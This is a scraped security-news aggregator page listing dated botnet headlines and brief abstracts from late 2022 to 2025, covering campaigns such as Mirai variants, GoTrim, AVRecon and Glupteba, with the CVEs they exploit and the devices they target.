Botnet
May 14, 2025
High Risk Warning for Windows Ecosystem: New Botnet Family HTTPBot is Expanding
Abstract
HTTPBot is a newly identified Trojan botnet written in Go, first detected in August 2024 and named by NSFOCUS Fuying Lab for its use of HTTP-based DDoS techniques. It has rapidly expanded, issuing over 200 attack commands by April 2025. (NSFocus Global)
April 29, 2025
Outlaw botnet detected in an incident contained by Kaspersky
Abstract
Outlaw (also known as “Dota”) is a Perl-based crypto-mining botnet that typically takes advantage of weak or default SSH credentials for its operations. Telemetry data showed victims across the US, Germany, Italy, Thailand, and more. (Secure List)
April 10, 2025
AI-Powered AkiraBot Bypasses CAPTCHAs, Spams Websites At Scale
Abstract
AkiraBot is designed to post AI-generated spam messages in chats, comments, and contact forms, tailored to the targeted website’s content to promote dubious Search Engine Optimization (SEO) services such as Akira and ServicewrapGO. (Sentinel One)
March 6, 2025
BadBox Malware Disrupted on 500K Infected Android Devices
Abstract
The BadBox Android malware botnet has been disrupted again by removing 24 malicious apps from Google Play and sinkholing communications for half a million infected devices. (Bleeping Computer)
March 1, 2025
Vo1d malware botnet grows to 1.6 million Android TVs worldwide
Abstract
A new variant of the Vo1d malware botnet has grown to 1,590,299 infected Android TV devices across 226 countries, recruiting devices as part of anonymous proxy server networks. (Bleeping Computer)
February 26, 2025
PolarEdge Botnet: 2,000+ IoT Devices Infected
Abstract
The botnet has infected over 2,000 devices globally and has been active since at least late 2023. The attack campaign exploits CVE-2023-20118, a remote code execution (RCE) vulnerability affecting multiple Cisco Small Business Router models. (Security Online)
January 22, 2025
Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei Routers
Abstract
The campaign is known to have been active since at least July 2024, with over 1,370 systems infected to date. A majority of the infections have been located in Malaysia, Mexico, Thailand, Indonesia, and Vietnam. (The Hacker News)
January 20, 2025
Python-Based Bots Exploiting PHP Servers Fuel Gambling Platform Proliferation
Abstract
The attack chains particularly involve attempts to deploy GSocket by leveraging pre-existing web shells installed on already compromised servers. Most of the attacks have been found to single out servers running the popular LMS, Moodle. (The Hacker News)
January 18, 2025
IoT Botnet Linked to Large-scale DDoS Attacks Since the End of 2024
Abstract
The botnet comprises malware variants derived from Mirai and Bashlite and infects IoT devices by exploiting vulnerabilities and weak credentials. The primary devices used in the botnet were wireless routers and IP cameras from well-known brands. (Trend Micro)
January 8, 2025
New Mirai Botnet Targets Industrial Routers with Zero-Day Exploits
Abstract
A relatively new Mirai-based botnet has been growing in sophistication and is now leveraging zero-day exploits for security flaws in industrial routers and smart home devices. (Bleeping Computer)
January 6, 2025
CryptBot Spread via Websites Promising Cracked Software
Abstract
CryptBot exploits search engine optimization (SEO) and partnerships with other malware operators to extend its reach. CryptBot primarily spreads through websites offering fake cracked software. (Intrinsec)
December 28, 2024
FICORA and Kaiten Botnets Exploit Old D-Link Vulnerabilities for Global Attacks
Abstract
Cybersecurity researchers are warning about a spike in malicious activity that involves roping vulnerable D-Link routers into two different botnets, a Mirai variant dubbed FICORA and a Kaiten (aka Tsunami) variant called CAPSAICIN. (Cyware)
December 10, 2024
Socks5Systemz Botnet Powers Illegal Proxy Service with 85,000+ Hacked Devices
Abstract
The primary objective of the malware is to turn compromised systems into proxy exit nodes, which are then advertised to other actors, typically cybercriminals who are looking to obscure the source of their attacks. (The Hacker News)
November 29, 2024
XorBot Botnet Resurfaces with Advanced Evasion and Exploits, Threatens IoT Devices
Abstract
XorBot operators have shifted their focus to profitability, openly advertising distributed denial-of-service (DDoS) attacks as a service under the alias “Masjesu Botnet.” They use Telegram for recruiting customers and promoting services. (Security Online)
November 26, 2024
PROSPERO & Proton66: Tracing Uncovering the Links Between Bulletproof Hosting Networks
Abstract
Intrinsec’s analysis reveals operational similarities between PROSPERO and Proton66. Both systems share nearly identical peering agreements and are linked to the same internet exchange point in St. Petersburg. (Intrinsec)
November 19, 2024
Ngioweb Botnet Fuels NSOCKS Residential Proxy Network Exploiting IoT Devices
Abstract
Two-thirds of these proxies are based in the U.S. The network maintains a daily average of roughly 35,000 working bots, with 40% remaining active for a month or longer. (The Hacker News)
September 20, 2024
Experts Warn of China-Linked APT’s Raptor Train IoT Botnet
Abstract
The attribution of the Raptor Train botnet to a Chinese nation-state actor is based on various factors, including operational timelines, targeting of sectors aligned with Chinese interests, and the use of the Chinese language. (Security Affairs)
September 11, 2024
Quad7 Botnet Targets More SOHO and VPN Routers, Media Servers
Abstract
The Quad7 botnet is expanding its reach by targeting additional SOHO devices with custom malware for Zyxel VPN appliances, Ruckus wireless routers, and Axentra media servers, in addition to previously reported TP-Link and ASUS routers. (Bleeping Computer)
August 15, 2024
New Gafgyt Botnet Variant Targets Weak SSH Passwords for GPU Crypto Mining
Abstract
A new variant of the Gafgyt botnet has been discovered by cybersecurity researchers, targeting machines with weak SSH passwords to mine cryptocurrency using GPU power. This variant is focusing on servers in cloud-native environments. (The Hacker News)
July 31, 2024
Source Code of Phorpiex Botnet with Anti-AV Capabilities on Sale
Abstract
The notorious Trik botnet, aka Phorpiex, is being sold in antivirus circles, offering advanced capabilities to evade detection. This C++ botnet includes modules such as a crypto clipper, a USB emitter, and a PE infector targeting crypto wallets. (Cybersecurity News)
July 10, 2024 – Phishing
Regional Transport Office Themed Phishing Campaign Targets Android Users In India
Abstract
Phishing messages impersonating the Regional Transport Office have been circulating since 2024, claiming traffic violations and prompting users to download a malicious APK named "VAHAN PARIVAHAN.apk". (Cyble)
As CISOs Grapple with the C-Suite, Job Satisfaction Takes a Hit
Abstract
Research shows that 75% of CISOs are considering a job change due to various challenges and pressures. CISOs often face accountability for cyber incidents and compliance failures, leading to discontent. (Cybersecurity Dive)
August 28, 2023
KmsdBot Malware Gets an Upgrade: Now Targets IoT Devices with Enhanced Capabilities
Abstract
An updated version of a botnet malware called KmsdBot is now targeting Internet of Things (IoT) devices, simultaneously branching out its capabilities and the attack surface. "The binary now includes support for Telnet scanning and support for more CPU architectures," Akamai security researcher Larry W. Cashdollar said in an analysis published this month. The latest iteration, observed since July 16, 2023, comes months after it emerged that the botnet is being offered as a DDoS-for-hire service to other threat actors. The fact that it's being actively maintained indicates its effectiveness in real-world attacks. KmsdBot was first documented by the web infrastructure and security company in November 2022. It's mainly designed to target private gaming servers and cloud hosting providers, although it has since set its eyes on some Romanian government and Spanish educational sites. The malware is designed to scan random IP addresses for open SSH ports and... (The Hacker News)
August 25, 2023
Whiffy Recon malware triangulates the position of infected systems via Wi-Fi
Abstract
Experts observed the SmokeLoader malware delivering a new Wi-Fi scanning malware strain dubbed Whiffy Recon. Secureworks Counter Threat Unit (CTU) researchers observed the Smoke Loader botnet dropping a new Wi-Fi scanning malware named Whiffy Recon... (Security Affairs)
August 11, 2023
Gafgyt botnet is targeting EoL Zyxel routers
Abstract
Researchers warn that the Gafgyt botnet is actively exploiting a vulnerability impacting the end-of-life Zyxel P660HN-T1A router. A variant of the Gafgyt botnet is actively attempting to exploit a vulnerability, tracked as CVE-2017-18368 (CVSS v3: 9.8)... (Security Affairs)
July 31, 2023
Experts link AVRecon bot to the malware proxy service SocksEscort
Abstract
The AVRecon botnet has relied on compromised small office/home office (SOHO) routers since at least May 2021. In early July, researchers from Lumen Black Lotus Labs discovered the AVRecon botnet that targets small office/home office (SOHO) routers and infected... (Security Affairs)
July 31, 2023
AVRecon Botnet Leveraging Compromised Routers to Fuel Illegal Proxy Service
Abstract
More details have emerged about a botnet called AVRecon, which has been observed making use of compromised small office/home office (SOHO) routers as part of a multi-year campaign active since at least May 2021. AVRecon was first disclosed by Lumen Black Lotus Labs earlier this month as malware capable of executing additional commands and stealing victims' bandwidth for what appears to be an illegal proxy service made available to other actors. It has also surpassed QakBot in terms of scale, having infiltrated over 41,000 nodes located across 20 countries worldwide. "The malware has been used to create residential proxy services to shroud malicious activity such as password spraying, web-traffic proxying, and ad fraud," the researchers said in the report. This has been corroborated by new findings from KrebsOnSecurity and Spur.us, which last week revealed that "AVrecon is the malware engine behind a 12-year-old service called SocksEscort, which rents hacke... (The Hacker News)
July 22, 2023
Multiple DDoS botnets were observed targeting Zyxel devices
Abstract
Researchers warn of several DDoS botnets exploiting a critical flaw tracked as CVE-2023-28771 in Zyxel devices. Fortinet FortiGuard Labs researchers warned of multiple DDoS botnets exploiting a vulnerability impacting multiple Zyxel firewalls. The... (Security Affairs)
July 19, 2023
Ukraine’s cyber police dismantled a massive bot farm spreading propaganda
Abstract
The Cyber Police Department of the National Police of Ukraine dismantled a massive bot farm and seized 150,000 SIM cards. A gang of more than 100 individuals used fake social network accounts to conduct disinformation and psychological operations... (Security Affairs)
July 14, 2023
New AVrecon botnet remained under the radar for two years while targeting SOHO Routers
Abstract
A new malware dubbed AVrecon targets small office/home office (SOHO) routers; it infected over 70,000 devices in 20 countries. Lumen Black Lotus Labs uncovered a long-running hacking campaign targeting SOHO routers with a strain of malware dubbed AVrecon. The... (Security Affairs)
July 13, 2023
TeamTNT’s Silentbob Botnet Infecting 196 Hosts in Cloud Attack Campaign
Abstract
As many as 196 hosts have been infected as part of an aggressive cloud campaign mounted by the TeamTNT group called Silentbob. "The botnet run by TeamTNT has set its sights on Docker and Kubernetes environments, Redis servers, Postgres databases, Hadoop clusters, Tomcat and Nginx servers, Weave Scope, SSH, and Jupyter applications," Aqua security researchers Ofek Itach and Assaf Morag said in a report shared with The Hacker News. "The focus this time seems to be more on infecting systems and testing the botnet, rather than deploying cryptominers for profit." The development arrives a week after the cloud security company detailed an intrusion set linked to the TeamTNT group that targets exposed JupyterLab and Docker APIs to deploy the Tsunami malware and hijack system resources to run a cryptocurrency miner. The latest findings suggest a broader campaign and the use of a larger attack infrastructure than previously thought, including various shell script... (The Hacker News)
June 26, 2023
Mirai Variant Targets Multiple IoT Vulnerabilities in Recent Campaign
Abstract
Unit 42 researchers uncovered a modified version of the Mirai botnet that is actively abusing at least 22 security flaws in devices manufactured by the likes of D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek. The attackers aim to take control of these devices and utilize them to carry... (Cyware)
June 24, 2023
Researcher Identifies Popular Swing VPN Android App as DDoS Botnet
Abstract
Swing VPN is a legitimate VPN app developed for Android and iOS systems by Limestone Software Solutions. However, according to researcher Lecromee, the Android version of this app is a DDoS botnet and allegedly harbors malicious intent. (Cyware)
June 22, 2023
New Mirai botnet targets tens of flaws in popular IoT devices
Abstract
Since March 2023, Unit 42 researchers have observed a variant of the Mirai botnet spreading by targeting tens of flaws in D-Link, Zyxel, and Netgear devices. Since March 2023, researchers at Palo Alto Networks Unit 42 have observed a new variant of the Mirai... (Security Affairs)
June 21, 2023
New Condi DDoS botnet targets TP-Link Wi-Fi routers
Abstract
Researchers discovered a new strain of malware called Condi that targets TP-Link Archer AX21 (AX1800) Wi-Fi routers. Fortinet FortiGuard Labs researchers discovered a new strain of malware called Condi that was observed exploiting a vulnerability... (Security Affairs)
June 21, 2023
Tsunami Botnet Found Targeting Unsecured Linux SSH Servers
Abstract
An unidentified cybercrime group was observed brute-forcing vulnerable Linux SSH servers to drop various malware strains, including the Tsunami DDoS bot. Tsunami, also known as Kaiten, is used by a multitude of threat actors as the source code of the botnet is publicly available... (Cyware)
June 20, 2023
New Tsunami botnet targets Linux SSH servers
Abstract
Researchers warn of an ongoing Tsunami DDoS botnet campaign targeting inadequately protected Linux SSH servers. Researchers from AhnLab Security Emergency response Center (ASEC) have uncovered an ongoing hacking campaign aimed at poorly protected... (Security Affairs)
June 17, 2023
From Cryptojacking to DDoS Attacks: Diicot Expands Tactics with Cayosin Botnet
Abstract
Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named Diicot, revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it's also the name of the Romanian organized crime and anti-terrorism policing unit," Cado Security said in a technical report. "In addition, artifacts from the group's campaigns contain messaging and imagery related to this organization." Diicot (née Mexals) was first documented by Bitdefender in July 2021, uncovering the actor's use of a Go-based SSH brute-forcer tool called Diicot Brute to breach Linux hosts as part of a cryptojacking campaign. Then earlier this April, Akamai disclosed what it described as a "resurgence" of the 2021 activity that's believed to have started around October 2022, netting the actor about $10,000 in illicit profits. "The attackers use a long ch... (The Hacker News)
June 12, 2023
IoT Botnet DDoS Attacks Threaten Global Telecom Networks, Nokia Reports
Abstract
In addition to the rise in botnet-driven DDoS attacks, Nokia's Threat Intelligence Report highlighted a doubling in the number of trojans targeting personal banking information on mobile devices, now accounting for 9% of all infections. (Cyware)
June 5, 2023
Experts warn of a surge of TrueBot activity in May 2023
Abstract
VMware’s Carbon Black Managed Detection and Response (MDR) team observed a surge of TrueBot activity in May 2023. Researchers at VMware’s Carbon Black Managed Detection and Response (MDR) team warn of a surge of TrueBot activity in May 2023. Truebot... (Security Affairs)
June 05, 2023
Alarming Surge in TrueBot Activity Revealed with New Delivery Vectors
Abstract
A surge in TrueBot activity was observed in May 2023, cybersecurity researchers disclosed. "TrueBot is a downloader trojan botnet that uses command and control servers to collect information on compromised systems and uses that compromised system as a launching point for further attacks," VMware's Fae Carlisle said. Active since at least 2017, TrueBot is linked to a group known as Silence that's believed to share overlaps with the notorious Russian cybercrime actor known as Evil Corp. Recent TrueBot infections have leveraged a critical flaw in Netwrix Auditor (CVE-2022-31199, CVSS score: 9.8) as well as Raspberry Robin as delivery vectors. The attack chain documented by VMware, on the other hand, starts off with a drive-by download of an executable named "update.exe" from Google Chrome, suggesting that users are lured into downloading the malware under the pretext of a software update. Once run, update.exe establishes connections with a k... (The Hacker News)
June 02, 2023
New Botnet Malware ‘Horabot’ Targets Spanish-Speaking Users in Latin America
Abstract
Spanish-speaking users in Latin America have been at the receiving end of a new botnet malware dubbed Horabot since at least November 2020. "Horabot enables the threat actor to control the victim's Outlook mailbox, exfiltrate contacts' email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim's mailbox," Cisco Talos researcher Chetan Raghuprasad said. The botnet program also delivers a Windows-based financial trojan and a spam tool to harvest online banking credentials as well as compromise Gmail, Outlook, and Yahoo! webmail accounts to blast spam emails. The cybersecurity firm said a majority of the infections are located in Mexico, with limited victims identified in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama. The threat actor behind the campaign is believed to be in Brazil. Targeted users of the ongoing campaign primarily span accounting, construction and engineering, wholesale distributio... (The Hacker News)
June 2, 2023
New botnet Horabot targets Latin America
Abstract
A new botnet malware dubbed Horabot has been targeting Spanish-speaking users in Latin America since at least November 2020. Cisco Talos researchers observed a previously unidentified botnet, dubbed Horabot, being deployed against Spanish-speaking... (Security Affairs)
June 1, 2023
Widespread exploitation by botnet operators of Zyxel firewall flaw
Abstract
Threat actors are actively exploiting a command injection flaw, tracked as CVE-2023-28771, in Zyxel firewalls to install malware. Threat actors are actively attempting to exploit a command injection vulnerability, tracked as CVE-2023-28771, that impacts... (Security Affairs)
June 01, 2023
Active Mirai Botnet Variant Exploiting Zyxel Devices for DDoS Attacks
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched critical security flaw in Zyxel gear to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2023-28771 (CVSS score: 9.8), the issue relates to a command injection flaw impacting different firewall models that could enable an unauthenticated attacker to execute arbitrary code by sending a specially crafted packet to the device. Zyxel addressed the security defect as part of updates released on April 25, 2023. The list of impacted devices is below:
- ATP (versions ZLD V4.60 to V5.35, patched in ZLD V5.36)
- USG FLEX (versions ZLD V4.60 to V5.35, patched in ZLD V5.36)
- VPN (versions ZLD V4.60 to V5.35, patched in ZLD V5.36)
- ZyWALL/USG (versions ZLD V4.60 to V4.73, patched in ZLD V4.73 Patch 1)
The Shadowserver Foundation, in a recent tweet, said the flaw is "being actively exploited to build a Mirai-like botnet" since M... (The Hacker News)
May 26, 2023
Dark Frost Botnet targets the gaming sector with powerful DDoS
Abstract
Researchers spotted a new botnet dubbed Dark Frost that is used to launch distributed denial-of-service (DDoS) attacks against the gaming industry. Researchers from Akamai discovered a new botnet called Dark Frost that was employed in distributed... (Security Affairs)
May 25, 2023
Dark Frost Botnet Launches Devastating DDoS Attacks on Gaming Industry
Abstract
A new botnet called Dark Frost has been observed launching distributed denial-of-service (DDoS) attacks against the gaming industry. "The Dark Frost botnet, modeled after Gafgyt, QBot, Mirai, and other malware strains, has expanded to encompass hundreds of compromised devices," Akamai security researcher Allen West said in a new technical analysis shared with The Hacker News. Targets include gaming companies, game server hosting providers, online streamers, and even other gaming community members with whom the threat actor has interacted directly. As of February 2023, the botnet comprises 414 machines running various instruction set architectures such as ARMv4, x86, MIPSEL, MIPS, and ARM7. Botnets are usually made up of a vast network of compromised devices around the world. The operators tend to use the enslaved hosts to mine cryptocurrency, steal sensitive data, or harness the collective internet bandwidth from these bots to knock down other websites and intern... (The Hacker News)
May 14, 2023
The latest variant of the RapperBot botnet adds cryptojacking capabilities
Abstract
FortiGuard Labs researchers spotted new samples of the RapperBot botnet that support cryptojacking capabilities. FortiGuard Labs researchers have discovered new samples of the RapperBot bot that added cryptojacking capabilities. Researchers from... (Security Affairs)
May 9, 2023
Fortinet warns of a spike of the activity linked to AndoryuBot DDoS botnet
Abstract
A DDoS botnet dubbed AndoryuBot has been observed exploiting an RCE, tracked as CVE-2023-25717, in Ruckus access points. FortiGuard Labs researchers have recently observed a spike in attacks attempting to exploit the Ruckus Wireless Admin remote code... (Security Affairs)
May 4, 2023
An Overview of Malicious Activities in Q1; Telegram Bots in Spotlight
Abstract
A new report by Cofense revealed that the volume of malicious campaigns utilizing Telegram bots in Q1 2023 exceeded that of Q4 2022 by 397% and surpassed the entire volume of 2022 by 310%. Additionally, YouTube was listed in the top 10 domains being used by threat actors to launch redirect phishing... (Cyware)
April 26, 2023
Mirai Botnet Variant Explores TP-Link to Grow its Army of DDoS Devices
Abstract
The Mirai botnet operators were seen abusing CVE-2023-1389, a vulnerability in the TP-Link Archer A21 (AX1800) WiFi router, and trying to make those devices part of their future DDoS attacks. The initial study of the attack infrastructure revealed targeted devices in the Eastern Europe region, howe... (Cyware)
April 26, 2023
The Anatomy of a Scalping Bot: NSB Was Copped!
Abstract
For the past eight years, NSB has been used by bot operators to acquire limited-edition and hard-to-find items from over 100 online shops. It's considered one of the best scalping bots available on the market, with an annual price of $499. (Cyware)
April 25, 2023
A new Mirai botnet variant targets TP-Link Archer A21
Abstract
The Mirai botnet started exploiting the CVE-2023-1389 vulnerability (aka ZDI-CAN-19557/ZDI-23-451) in TP-Link Archer A21 in recent attacks. Last week, the Zero Day Initiative (ZDI) threat-hunting team observed the Mirai botnet attempting to exploit CVE-2023-1389... (Security Affairs)
April 3, 2023
Moobot botnet spreads by targeting Cacti and RealTek flaws
Abstract
The Moobot botnet is actively exploiting critical vulnerabilities in Cacti and Realtek in attacks in the wild. FortiGuard Labs researchers observed an ongoing hacking campaign targeting Cacti (CVE-2022-46169) and Realtek (CVE-2021-35394) vulnerabilities... (Security Affairs)
March 21, 2023
New ShellBot bot targets poorly managed Linux SSH Servers
Abstract
New ShellBot DDoS bot malware, aka PerlBot, is targeting poorly managed Linux SSH servers, ASEC researchers warn. AhnLab Security Emergency response Center (ASEC) discovered a new variant of the ShellBot malware that was employed in a campaign that... (Security Affairs)
March 17, 2023
HinataBot, a new Go-Based DDoS botnet in the threat landscape
Abstract
A new Golang-based DDoS botnet, tracked as HinataBot, targets routers and servers by exploiting known vulnerabilities. Akamai researchers spotted a new Golang-based DDoS botnet, dubbed HinataBot, which has been observed exploiting known flaws... (Security Affairs)
March 13, 2023
Golang-Based Botnet GoBruteforcer targets web servers
Abstract
A recently discovered Golang-based botnet, dubbed GoBruteforcer, is targeting web servers running FTP, MySQL, phpMyAdmin, and Postgres services. Researchers from Palo Alto Networks Unit 42 recently discovered a Golang-based botnet, tracked as GoBruteforcer,... (Security Affairs)
March 11, 2023
Prometei botnet evolves and infected +10,000 systems since November 2022
Abstract
A new version of the Prometei botnet has infected more than 10,000 systems worldwide since November 2022, experts warn. Cisco Talos researchers reported that the Prometei botnet has infected more than 10,000 systems worldwide since November 2022... (Security Affairs)
March 11, 2023
GoBruteforcer: Golang-Based Botnet Actively Harvests Web Servers
Abstract
The Go programming language is a newer language that’s becoming more popular with malware programmers. It has proven to be versatile enough to develop all kinds of malware, including ransomware, stealers, or remote access trojans (RATs). (Cyware)
March 10, 2023
New Version of Prometei Botnet Infects Over 10,000 Systems Worldwide
Abstract
An updated version of a botnet malware called Prometei has infected more than 10,000 systems worldwide since November 2022. The infections are both geographically indiscriminate and opportunistic, with a majority of the victims reported in Brazil, Indonesia, and Turkey. Prometei, first observed in 2016, is a modular botnet that features a large repertoire of components and several proliferation methods, some of which also include the exploitation of ProxyLogon Microsoft Exchange Server flaws. It's also notable for avoiding striking Russia, suggesting that the threat actors behind the operation are likely based in the country. The cross-platform botnet's motivations are financial, primarily leveraging its pool of infected hosts to mine cryptocurrency and harvest credentials. The latest variant of Prometei (called v3) improves upon its existing features to challenge forensic analysis and further burrow its access on victim machines, Cisco Talos said in a report share... (The Hacker News)
February 22, 2023
The number of devices infected by the MyloBot botnet is rapidly increasing
Abstract
Researchers warn that the MyloBot botnet is rapidly spreading and is infecting thousands of systems worldwide. The MyloBot botnet has been active since 2017 and was first detailed by cybersecurity firm Deep Instinct in 2018. MyloBot is a highly... (Security Affairs)
February 21, 2023
MyloBot Botnet Spreading Rapidly Worldwide: Infecting Over 50,000 Devices Daily
Abstract
A sophisticated botnet known as MyloBot has compromised thousands of systems, with most of them located in India, the U.S., Indonesia, and Iran. That's according to new findings from BitSight, which said it's "currently seeing more than 50,000 unique infected systems every day," down from a high of 250,000 unique hosts in 2020. Furthermore, an analysis of MyloBot's infrastructure has found connections to a residential proxy service called BHProxies, indicating that the compromised machines are being used by the latter. MyloBot, which emerged on the threat landscape in 2017, was first documented by Deep Instinct in 2018, calling out its anti-analysis techniques and its ability to function as a downloader. "What makes Mylobot dangerous is its ability to download and execute any type of payload after it infects a host," Lumen's Black Lotus Labs said in November 2018. "This means at any time it could download any other type of malware th... (The Hacker News)
February 17, 2023
New Mirai Botnet Variant ‘V3G4’ Exploiting 13 Flaws to Target Linux and IoT Devices
Abstract
A new variant of the notorious Mirai botnet has been found leveraging several security vulnerabilities to propagate itself to Linux and IoT devices. Observed during the second half of 2022, the new version has been dubbed V3G4 by Palo Alto Networks Unit 42, which identified three different campaigns likely conducted by the same threat actor. "Once the vulnerable devices are compromised, they will be fully controlled by attackers and become a part of the botnet," Unit 42 researchers said. "The threat actor has the capability to utilize those devices to conduct further attacks, such as distributed denial-of-service (DDoS) attacks." The attacks primarily single out exposed servers and networking devices running Linux, with the adversary weaponizing as many as 13 flaws that could lead to remote code execution (RCE). Some of the notable flaws relate to critical flaws in Atlassian Confluence Server and Data Center, DrayTek Vigor routers, Airspan AirSpot, and Geu... (The Hacker News)
February 16, 2023
Mirai V3G4 botnet exploits 13 flaws to target IoT devices
Abstract
During the second half of 2022, a variant of the Mirai bot, tracked as V3G4, targeted IoT devices by exploiting tens of flaws. Palo Alto Networks Unit 42 researchers reported that a Mirai variant called V3G4 was attempting to exploit several flaws... (Security Affairs)
February 9, 2023
Medusa Botnet Goes Through a Major Transformation
Abstract
Researchers at Cyble uncovered a new Medusa DDoS botnet version based on the leaked Mirai source code. With this, it has appropriated Mirai's DDoS attack choices and Linux targeting capabilities. It comes with a ransomware module and a Telnet brute-forcer. Additionally, a dedicated portal now adverti... (Cyware)
February 8, 2023
Qakbot Mechanizes Distribution of Malicious OneNote Documents
Abstract
Qakbot began using OneNote .one documents (also called “Notebooks” by Microsoft) in their attacks on January 31. On Tuesday, Sophos researchers observed two parallel spam campaigns. (Cyware)
February 3, 2023
HeadCrab Botnet Targets 1,200 Redis Servers in a New Elusive Campaign
Abstract
Aqua Security researchers found a new malware, dubbed HeadCrab, that has infected over a thousand Redis servers since September 2021. Researchers found approximately 1,200 actively infected servers that it has been abusing to mine Monero cryptocurrency. HeadCrab uses state-of-the-art infrastructure... (Cyware)
January 25, 2023
Ticketmaster Blames Bots in Taylor Swift ‘Eras’ Tour Debacle
Abstract
This week, Ticketmaster testified in Senate Judiciary Committee hearings that it's not the company's monopoly on the live music market that caused the Swifty sales collapse — it was instead a cyberattack, executives said. (Cyware)
December 23, 2022
IcedID Botnet Distributors Abuse Google PPC to Distribute Malware
Abstract
Trend Micro researchers say that malicious actors are using malvertising to distribute the IcedID malware via cloned webpages of legitimate organizations and well-known applications. (Cyware)
December 22, 2022
A new Zerobot variant spreads by exploiting Apache flaws
Abstract
Microsoft spotted an upgraded variant of the Zerobot botnet that spreads by exploiting Apache vulnerabilities. Microsoft Threat Intelligence Center (MSTIC) researchers discovered a new variant of the Zerobot botnet (aka ZeroStresser) that was improved... (Security Affairs)
December 20, 2022
Glupteba Botnet Rises from the Dead
Abstract
Experts at Nozomi Networks announced that they spotted an ongoing Glupteba botnet campaign, starting June 2022. Just a year ago, Google had claimed to dismantle the botnet’s infrastructure. Glupteba operators used the Bitcoin blockchain for hiding C&C domains, making it resilient to takedown ef... (Cyware)
December 19, 2022
Glupteba botnet is back after Google disrupted it in December 2021 Full Text
Abstract
The Glupteba botnet is back: researchers reported a surge in infections worldwide after Google disrupted its operation in 2021. In December 2021, Google announced it had taken down the infrastructure operated by the Glupteba botnet, and it also sued...Security Affairs
December 19, 2022
Glupteba botnet is back after Google disrupted it in December 2021 Full Text
Abstract
The blockchain-enabled botnet has been active since at least 2011, researchers estimated that the Glupteba botnet was composed of more than 1 million Windows PCs around the world as of December 2021.Cyware
December 16, 2022
MCCrash botnet targets private Minecraft servers, Microsoft warns Full Text
Abstract
Microsoft announced that a botnet dubbed MCCrash is launching distributed denial-of-service (DDoS) attacks against private Minecraft servers. Microsoft spotted a cross-platform botnet, tracked as MCCrash, which has been designed to launch distributed...Security Affairs
December 15, 2022
GoTrim Brute Forcer Botnet Scans Internet for WordPress Sites Full Text
Abstract
FortiGuard Labs identified an ongoing, previously unseen CMS scanner and brute forcer, dubbed GoTrim, installed in infected WordPress sites on Linux systems. The botnet detects and evades anti-bot techniques used by web hosting providers and CDNs, such as Cloudflare and SiteGround. WordPr ... Read MoreCyware
December 14, 2022
GoTrim botnet actively brute forces WordPress and OpenCart sites Full Text
Abstract
Researchers discovered a new Go-based botnet, dubbed GoTrim, attempting to brute force WordPress websites. Fortinet FortiGuard Labs researchers spotted a new Go-based botnet, dubbed GoTrim, that has been spotted scanning and brute-forcing WordPress...Security Affairs
December 13, 2022
New GoTrim botnet brute forces WordPress site admin accounts Full Text
Abstract
A new Go-based botnet malware named 'GoTrim' is scanning the web for self-hosted WordPress websites and attempting to brute force the administrator's password and take control of the site.BleepingComputer
December 7, 2022
New Go-based botnet Zerobot exploits dozens of flaws Full Text
Abstract
Researchers discovered a new Go-based botnet called Zerobot that exploits two dozen security vulnerabilities in IoT devices. Fortinet FortiGuard Labs researchers have discovered a new Go-based botnet called Zerobot that spreads by exploiting two dozen...Security Affairs
November 30, 2022
Cybersecurity researchers take down DDoS botnet by accident Full Text
Abstract
While analyzing its capabilities, Akamai researchers have accidentally taken down a cryptomining botnet that was also used for distributed denial-of-service (DDoS) attacks.BleepingComputer
November 27, 2022
Black Basta and Qakbot Join Hands to Attack U.S. Companies Full Text
Abstract
Cybereason researchers identified widespread Qakbot (QBot or Pinkslipbot) campaigns targeting U.S.-based companies. The Black Basta ransomware gang is behind these recent campaigns.Cyware Alerts - Hacker News
November 26, 2022
All You Need to Know About Emotet in 2022 Full Text
Abstract
For 6 months, the infamous Emotet botnet has shown almost no activity, and now it's distributing malicious spam. Let's dive into details and discuss all you need to know about the notorious malware to combat it. Why is everyone scared of Emotet? Emotet is by far one of the most dangerous trojans ever created. The malware became a very destructive program as it grew in scale and sophistication. The victim can be anyone from corporate to private users exposed to spam email campaigns. The botnet distributes through phishing containing malicious Excel or Word documents. When users open these documents and enable macros, the Emotet DLL downloads and then loads into memory. It searches for email addresses and steals them for spam campaigns. Moreover, the botnet drops additional payloads, such as Cobalt Strike or other attacks that lead to ransomware. The polymorphic nature of Emotet, along with the many modules it includes, makes the malware challenging to identify. The EmotetThe Hacker News
November 22, 2022
Botnet Turned InfoStealer Aurora Gaining Traction Among Threat Actors Full Text
Abstract
Aurora is a Golang-based info-stealer, which runs several commands upon execution through WMIC to collect basic host information, snaps a desktop image, and exfiltrates data to the C2 server.Cyware Alerts - Hacker News
November 21, 2022
QBot Uses DLL Hijacking, Abuses Control Panel Executable In a Fresh Attack Wave Full Text
Abstract
The malware quietly runs in the background, steals emails for use in phishing attacks, and downloads additional post-exploitation toolkits such as Brute Ratel or Cobalt Strike.Cyware Alerts - Hacker News
November 21, 2022
Google Wins Lawsuit Against Russians Linked to Blockchain-based Glupteba Botnet Full Text
Abstract
Google has won a lawsuit filed against two Russian nationals in connection with the operation of a botnet called Glupteba, the company said last week. The U.S. District Court for the Southern District of New York imposed monetary sanctions against the defendants and their U.S.-based legal counsel. The defendants have also been asked to pay Google's attorney fees. The defendants' move to press sanctions against Google was denied. The development comes nearly a year after the tech giant took down the malware's command-and-control infrastructure and initiated legal proceedings against Dmitry Starovikov and Alexander Filippov, who are said to have been in charge of running the illegal botnet. The defendants, along with 15 others, have also been accused of using the malware to create a hacked network of devices to mine cryptocurrencies, harvest victims' personal and financial data, and place disruptive ads. Glupteba is distinguished from its botnet counterparts bThe Hacker News
November 16, 2022
Updated RapperBot malware targets game servers in DDoS attacks Full Text
Abstract
The Mirai-based botnet 'RapperBot' has re-emerged via a new campaign that infects IoT devices for DDoS (Distributed Denial of Service) attacks against game servers.BleepingComputer
November 14, 2022
KmsdBot, a new evasive bot for cryptomining activity and DDoS attacks Full Text
Abstract
